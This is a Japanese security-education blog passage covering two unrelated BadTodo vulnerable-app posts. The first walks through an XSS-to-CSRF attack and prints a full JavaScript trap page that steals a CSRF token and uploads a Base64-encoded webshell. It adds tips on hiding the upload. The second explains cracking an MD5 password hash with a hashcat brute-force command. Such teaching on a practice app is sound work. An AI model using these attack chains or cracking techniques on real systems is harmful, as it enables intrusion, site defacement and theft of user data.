BadTodo - 4.1 XSS（クロスサイト・スクリプティング）
BadTodo - 10.1 CSRF（クロスサイト・リクエスト・フォージェリ）
BadTodo - 10.7 XSSによるCSRF対策の突破
前回：BadTodo - 24 適切でないアップロートファイル制限
などを混ぜて色々やってみます。

まず今回、XSSの脆弱性を使い、ユーザーにCSRF相当の罠を実行させ、悪意のあるハッカーが利用できるプログラムファイルをアップロードさせます。
次回、そのウェブ上に設置したプログラム（WebShell）を使いサイトを改ざんし、ユーザーの入力情報を盗みます。

XSSの脆弱性を使い、ファイルをアップロードさせる

既存のユーザが作成済みの Todo を狙い、それに対する編集・修正リクエストをXSSにて実行させることでWebShellファイルのアップロードを行います。（Todoを新規作成"addtodo.php"させても良いですが、元からある物の一部を修正"editdone.php"する方がバレにくい）
※上記で「CSRF相当の罠を実行させ」と書いていますが、これは「（CSRFの罠にかかるのと同様な）本人の意図しないファイルアップロードを、XSSより行う」という意味です。

こちらを狙うことにしました。

ハッカーは自身でも何件かTodoを登録・修正してリクエストの動作を確認します。

全項目入力し、ファイルを再添付して保存した際のリクエストは下記です。

POST /editdone.php HTTP/1.1
Host: todo.example.jp
Cookie: TODOSESSID=2215e7b019599a578aece5b7c4dacf4d; PHPSESSID=7p8bhp3ort6qegq74noibd3s04; adminer_version=4.8.1
～中略～
Origin: https://todo.example.jp
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://todo.example.jp/edittodo.php?rnd=66ade53cee8b9&item=5
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="todotoken"

439e154d28ca5d451ac11a0f9fcbe62d
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="item"

5
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="todo"

hacker
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="c_date"

2024-08-03
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="due_date"

2024-08-03
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="public"

1
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="memo"

test
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="attachment"; filename="Test.txt"
Content-Type: text/plain

ID: TestA
Pass: TestA
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="url"

https://www.example.com/
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw
Content-Disposition: form-data; name="url_text"

Example Domain
------WebKitFormBoundaryi6Fi8tBZZ3IhFzCw--

trap.example.org に設置する罠を作成します。

・BadTodoはjQuery1系を使っているため Ajaxを使いました（jQuery2系以下と3系では書き方が少し違います）
・1番目の ajaxでCSRFトークンを取得し、2番目の ajaxでそのトークンを使いPOSTリクエストを送る
・修正を狙うTodoを確認しパラメータを修正。item=4、todo, due_date, memo, url, url_textは空値
・アップロードするファイル webshell.php の内容を Base64エンコードする
・Base64でエンコードされたデータの文字列を window.atob() メソッドでデコードする
Window: atob() メソッド - Web API | MDN
よって以下のようになります。（XSS_CSRF_WebShell.html）

<html>

<body>
  大当たり！
  <script src="https://todo.example.jp/js/jquery-1.8.3.js"></script>
  <script>
    $.ajax({
      url: "https://todo.example.jp/edittodo.php?item=4",
      xhrFields: {
        withCredentials: true
      },
      success: function (d) {
        console.log("The token is: " + d.response);
        let token = d.match("[0-9a-z]{32}")[0];
        console.log("The token is: " + token);
        let up = "webshell.php";
        $.ajax({
          url: "https://todo.example.jp/editdone.php",
          contentType: "multipart/form-data; boundary=----XXX",
          type: "POST",
          xhrFields: {
            withCredentials: true
          },
          data:
            "------XXX\r\n"
            + "Content-Disposition: form-data; name=\"todotoken\"\r\n\r\n"
            + token + "\r\n"
            + "------XXX\r\n"
            + "Content-Disposition: form-data; name=\"item\"\r\n\r\n"
            + "4\r\n"
            + "------XXX\r\n"
            + "Content-Disposition: form-data; name=\"todo\"\r\n\r\n"
            + "test\r\n"
            + "------XXX\r\n"
            + "Content-Disposition: form-data; name=\"c_date\"\r\n\r\n"
            + "2024-08-03\r\n"
            + "------XXX\r\n"
            + "Content-Disposition: form-data; name=\"due_date\"\r\n\r\n"
            + "\r\n"
            + "------XXX\r\n"
            + "Content-Disposition: form-data; name=\"public\"\r\n\r\n"
            + "1\r\n"
            + "------XXX\r\n"
            + "Content-Disposition: form-data; name=\"memo\"\r\n\r\n"
            + "\r\n"
            + "------XXX\r\n"
            + "Content-Disposition: form-data; name=\"attachment\"; filename=\"webshell.php\"\r\n"
            + "Content-Type: application/octet-stream\r\n\r\n"
            + window.atob("PD9wa～中略～9keT4=")
            + "\r\n"
            + "------XXX\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n"
            + "\r\n"
            + "------XXX\r\nContent-Disposition: form-data; name=\"url_text\"\r\n\r\n"
            + "\r\n"
            + "------XXX--\r\n"
        })
      }
    })
  </script>
</body>

</html>

罠の設置

https://trap.example.org/XSS_CSRF_webshell.html

ユーザが罠にかかる

今回狙われたユーザ test が罠リンクをクリックしてしまった。

この時点でファイルのアップロードが完了しています。（66adf4c4-webshell.php）

諸々の確認

Burpを確認すると、まず todo.php 上の罠リンクから XSS_CSRF_webshell.html に遷移し、次に GET /edittodo.php で訪れた先でCSRFトークンを取得し、最後に POST /editdone.php でファイルアップロードを含むTodo修正リクエストが送られています。

指定通り Content-Type: multipart/form-data; で送信され、Base64形式でエンコードされていた文字列が正しくデコードされ元のデータに戻っていることも分かります（この例ではぼかしている部分）。

今回利用されたTodoは表面上は何も変わってないように見えます。

• 前回指摘したように、適切でない拡張子のファイルをアップロードすると表面上は失敗しTodoには登録されないため
• ファイルのアップロードが適切にTodoに反映される場合は、ファイルが添付されたTodoを狙い既存のファイル名と似たややこしいファイル名を付けてバレにくくしましょう
• また非公開のTodoを狙うとさらに気付かれにくいでしょう。参考： 3.2 SQLインジェクション 非公開情報の漏洩
• CSRFの脆弱性があると、ユーザ自身がファイルアップロード権限を持っておらず管理者のみに許可されている場合でも管理者が狙われ罠を実行してしまう可能性があります
• また管理者用の別サイトでのみファイルアップロードが許されているような場合でも、サイト間を跨いだ持続型 XSSと組み合わせることで実行できる場合があります（次回の資料動画を参照ください）

補足

（今回の攻撃は trap.example.org から todo.example.jpへ、つまりクロスオリジンへのリクエストです。これらのリクエストは同一オリジンポリシーとCORSという仕組みで守られ、または許可されたりするのですが、それについてはまた後日）
（Access-Control-Allow-Origin レスポンスヘッダが外部の問題のあるドメイン(trap.example.org)を許可してしまっています）

次回は設置したWebShellを使いサイトを改ざんし、ユーザの入力したデータを窃取します。

次回：やられアプリ BadTodo - 25.2 色々混ぜてやってみる２（XSS - CSRF -WebShell） - demandosigno

前回：やられアプリ BadTodo - 17.3 パスワードハッシュ化の目的 - demandosigno

パスワード解析ソフトの John the Ripper でもハッシュの解析はできるのですが、今回は hashcat を使います。
その名の通りハッシュの解析ができます。強力なグラフィックボードはハッシュの解析も速いため、ベンチマークソフトとしても使われています。
hashcat - advanced password recovery

hashcatは様々なハッシュの種類やソルト付きハッシュに対応していますが、私のPCのグラフィックボードは古くて性能が低いため以下の内容で試します。
・ハッシュ関数はMD5（ソルト無し）
・ハッシュの元とするパスワードは、8文字の英大文字・小文字・数字
・hashcat-5.1.0（昨年試した際の記録かつ私のグラボに対応可能なバージョンのため古いです）
・NVIDIA GeForce GTX 1070（+CUDAのインストールが必要です）
・Windows 10

開始

hashcat64.exe -m 0 -a 3 hash.txt -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1 --increment --increment-min=8（パラメータを色々付けて試してみたため少し冗長かも）

[s]tatus 「キーボードの s」を押して途中経過を確認します。（新しいバージョンでは最初から経過が表示されているかもしれません）

コマンド詳細

https://hashcat.net/wiki/doku.php?id=mask_attack
hashcat64.exe -m 0 -a 3 hash.txt -1 ?l?u?d ?1?1?1?1?1?1?1?1?1?1 --increment --increment-min=8
-m : ハッシュの種類。0 = MD5ハッシュを指定（その他のハッシュ）
- a : アタックモード。3 = ブルートフォースアタック。総当たり（すべての大文字、小文字、数字を含む文字セットを使用する）かつマスクを指定できる
-1 : カスタム文字列として1つ設定
?l?u?d : プレースホルダを使ってパスワード候補を構成する
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?1?1?1?1?1?1?1?1?1?1 : 先に設定したカスタム文字列１を使用して10文字を解析
--increment : インクリメントフラグ。マスクはパスワードの長さに固有、このままだと10文字分だけ解析してしまうため、?1 → ?1?1 → ?1?1?1... と一つずつ増やしていくために必要なフラグ
--increment-min : 8 = 8文字からスタートします。「パスワード要件として最小8文字」と規定されている場合などは7文字以下の解析は不要です
hash.txt : 解析するハッシュ値を記録したテキストファイル（今回は 5f4dcc3b5aa765d61d8327deb882cf99 の一つだけ記載）

結果

Status : Cracked となっており、見つかったパスワードがあります
Time.Started : (9 hours, 53 mins) 8文字を解析するのにかかった時間です
Guess.Queus : 1/3。8文字, 9文字, 10文字の内、8文字分の解析が終了したということです
Speed.#1 : 6154.1 MH/s。約6.1Gハッシュ/秒の速度が出ています
Progress : 218340105584896/218340105584896 (100.00%)
英大文字・小文字・数字の8桁 = (26+26+10)⁸ = 218,340,105,584,896 (218兆) 通りです。
これは 218テラ、218,340ギガであり、速度の6.1ギガで割ると35,793秒 ≒ 9.9時間、先の記載に合致します。
5f4dcc3b5aa765d61d8327deb882cf99:password : 今回見つかった結果です。総当たりの結果、ハッシュの元の文字列は「password」であったことが分かります。（この例であれば総当たりよりは「辞書攻撃」の方がずっと早く終わります。hashcat での辞書攻撃は “straight”モードと名づけられており、アタックモード = 0 (-a 0)で実行できます。
今回は元のリストのパスワードを１つしか記載しませんでしたが、総当たりですのでこの時点ですべての8文字のパスの解析が終わっています。

[s]tatus =「s」キーを押して途中経過を見ています。
引き続き 9文字目の解析に入っています。(Guess.Mask : ?1?1?1?1?1?1?1?1?1 [9])
しかしながら、9文字目を終了するには 13537086546263552 (0.44%) と出ている通り (26+26+10)⁹=13,537,086,546,263,552（1京3537兆）のパターンを総当たりする必要があります。 これには8桁目の62倍の560時間≒26日の計算が必要になるため、[q]uit 「qキーを押して途中終了」しました。（そもそも今回の例では8文字パス１つだけしか登録していません）
この結果からパスワードの文字数を増やすことが有効であると分かります。

解析途中でタスクマネージャを見てみます。

今回NVIDIA社のグラフィックボードとCUDAを使いました。実際にCUDAがバリバリ働いていることが分かります（CUDAが表示されていない場合には、いずれかのグラフの ∨ をクリックしてドロップダウンから選択できます）。また温度が上がりますので夏場は注意です。
CUDA（Compute Unified Device Architecture：クーダ）とは、NVIDIAが開発・提供している、GPU向けの汎用並列計算用プラットフォームです。もともとリアルタイムグラフィックス表示用途、特にゲームグラフィックス用途に特化したGPUを開発していたNVIDIAが、その高い処理性能をグラフィックス以外にも活用できるようにするために開発した技術がCUDAです。CUDA - Wikipedia
今回のように、１つのハッシュ変換はたやすいが大量にこなすような仕事には並列計算が有用です。

私のグラボ(GeForce GTX 1070 2016年発売 6.1GH/s)だと8文字(218,340G)に約10時間かかりましたが、最新のグラボ(RTX 4090)では 164.1GH/s の速度が出ており 218,340/164.1=1,331s=22分となります。
Hashcat v6.2.6 benchmark on the Nvidia RTX 4090 · GitHub

前回紹介した記事に一覧表が載っていますが、こちらもhashcatを使っておりRTX 4090は同じく22分と出ています。英字数字に加えて記号(^*%$!&@#)を混ぜた場合でも59分。
1万基のNVIDIA A100とChatGPTによる解読も試しており、その場合これを１秒で解いています。ただ費用面から実用的ではありません。「消費者がアクセスしやすい構成としては RTX 4090 × 12 くらいがベストだと思う」だそうです。
Are Your Passwords in the Green?
恐るべし、今どきの「パスワード破り」の手口：780th Lap - キーマンズネット

現実的なA100を12基採用したシステムでbcryptハッシュ化された同8文字のパスワードを解読した場合は、約12年かかる。もちろんその間の演算性能向上を考慮する必要はあるが、パスワードを変更すれば安全性は高まるとしている。
複雑な8文字のパスワードでも、MD5ハッシュだとGeForce RTX 4090で1時間以内に解読されてしまう - PC Watch

これらの実施はクラウドを使うにしてもローカルに置いたデータの解析です。パスワードのハッシュ値が漏洩しているということは、攻撃者は既にサイトに侵入済みということになります。
ネットのホームページのログインフォームに対してブルートフォースアタックをかける場合はこんな高速にはできません（アカウントロックもあります）。手元にあるハッシュの解析とWebのログイン試行ではそもそもが別の話になりますので混同しないようにしてください。

その他

今時ソルト無しMD5で保存されていることはないだろうと思われるかもしれませんが、昨年（2023年に）話題になった事件ではパスワードがソルト無しMD5で保存されていたため、流出後に一部が解析され平文パスワードの形でハッキングフォーラムに投稿されてしまいました。
https://doc.pictbland.net/
また『各種情報はデータベース上で暗号化されておりましたが、暗号の複合キーも同時に漏洩しており既に複合されていると考えられます』とのことです。

情報漏えいについてのご報告 | Notion
不正アクセスによるpictBLand、pictSQUAREの情報流出の可能性についてまとめてみた - piyolog
SNS「ピクブラ」ユーザー情報80万件流出、復号キーも 「全サーバとプログラム廃棄して再構築」へ - ITmedia NEWS

次回：やられアプリ BadTodo - 18 クローラへの耐性 - demandosigno